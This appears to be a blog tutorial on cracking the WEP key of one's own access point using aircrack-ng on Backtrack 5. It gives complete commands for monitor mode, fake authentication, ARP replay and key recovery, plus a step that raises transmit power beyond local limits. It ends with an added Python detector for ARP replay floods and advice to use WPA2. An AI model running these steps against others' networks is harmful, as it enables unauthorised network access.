Ok another WEP cracking guide because I just felt there wasn’t enough out there already 🙂
I am going to crack my wireless access point with a MacBook Pro running Backtrack 5 as a virtual machine. To do this in a virtual machine you must use a USB wifi adapter; built-in hardware will NOT WORK in a VM.
Watch the video to see it in action and then read the post for the full breakdown.
http://www.youtube.com/watch?v=1zBQrkdt45w
My setup is as follows:
- Backtrack 5 R1 VM
- USB Alfa AWUS036H (100mW) wifi adapter with 5dB aerial (very cheap off eBay, and plenty with free delivery out there)
**For educational purposes only
**Note: if you have Ubuntu you can install aircrack-ng and perform the same crack.
sudo apt-get install aircrack-ng
Run this command (only if you have a high-powered card like the Alfa):
iw reg set NZ
Important to note you may not be able to reach 1000mW depending on the laws set in your country.
ifconfig wlan0 down
ifconfig wlan0 up
iwconfig
If it has worked you should see the TX Power is now at 30dB. We can now get started.
Your wireless adapter must be in monitor mode. Most wireless cards require special drivers, and the guys behind Backtrack have taken care of this for us.
airmon-ng start wlan0
airodump-ng mon0
airodump-ng mon0 -c 6 --bssid 00:1c:8c:d0:70:ec -w crackme
Leave this window running and open a second terminal. We will fake authenticate our wifi card with the device; if we don't, the replay attack will fail. If there are devices on the network, skip to the replay attack.
aireplay-ng mon0 -1 3 -a 00:1c:8c:d0:70:ec
All going well you will see “Association successful :-)”
Now to perform an ARP replay attack, which captures an ARP packet and sends it over and over to generate traffic on the access point. Modify your command so it looks like this:
aireplay-ng mon0 -3 -b 00:1c:8c:d0:70:ec
Give it some time and, all going well, you will start to see the "Data" figure from the aircrack window start to increase.
Once that begins it's just a matter of time before it's cracked. You can start cracking the file right away, even while data is still being collected. Open yet a third console and run:
aircrack-ng crackme-01.cap
The password will not be recovered until enough data has been collected; it will automatically retry once the data increases.
Watch the video if you are unclear
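
Seen from the access point owner's side, the ARP replay step above is very noisy: one sender pushes hundreds of same-sized broadcast frames per second, which normal clients never do. The script below is an added example (not part of the original post) that flags that pattern in a frame log. The log format, the MAC addresses, the threshold and the 68/86-byte size of an encrypted ARP request are all assumptions made for the example.

```python
from collections import defaultdict, deque

ARP_SIZES = {68, 86}   # assumed on-air sizes of a WEP-encrypted ARP request
BROADCAST = "ff:ff:ff:ff:ff:ff"

def parse(line):
    """Parse 'epoch_seconds src_mac dst_mac frame_len' (constructed log format)."""
    ts, src, dst, length = line.split()
    return float(ts), src.lower(), dst.lower(), int(length)

def detect_arp_replay(lines, window=1.0, threshold=50):
    """Return {src_mac: peak frame count} for senders whose ARP-sized
    broadcast frames exceed `threshold` inside any `window` seconds."""
    recent = defaultdict(deque)   # src -> timestamps still inside the window
    peak = defaultdict(int)
    for line in lines:
        if not line.strip():
            continue
        ts, src, dst, length = parse(line)
        if dst != BROADCAST or length not in ARP_SIZES:
            continue              # ignore unicast and non-ARP-sized traffic
        q = recent[src]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()           # slide the window forward
        peak[src] = max(peak[src], len(q))
    return {src: n for src, n in peak.items() if n > threshold}

def sample_log():
    """Constructed sample: one normal client and one sender replaying ARP."""
    lines = []
    for i in range(5):            # normal client: one ARP request every 2 s
        lines.append(f"{100 + 2 * i:.3f} aa:aa:aa:00:00:01 {BROADCAST} 68")
        lines.append(f"{100.5 + 2 * i:.3f} aa:aa:aa:00:00:01 00:11:22:33:44:55 1500")
    for i in range(400):          # replay: 400 identical-size frames in 1 s
        lines.append(f"{105 + i * 0.0025:.4f} bb:bb:bb:00:00:02 {BROADCAST} 68")
    return sorted(lines, key=lambda l: float(l.split()[0]))

if __name__ == "__main__":
    for mac, n in detect_arp_replay(sample_log()).items():
        print(f"ALERT possible ARP replay from {mac}: {n} frames in 1s")
```

The real fix is to stop using WEP and move the access point to WPA2 or newer; the detector only tells you someone is trying.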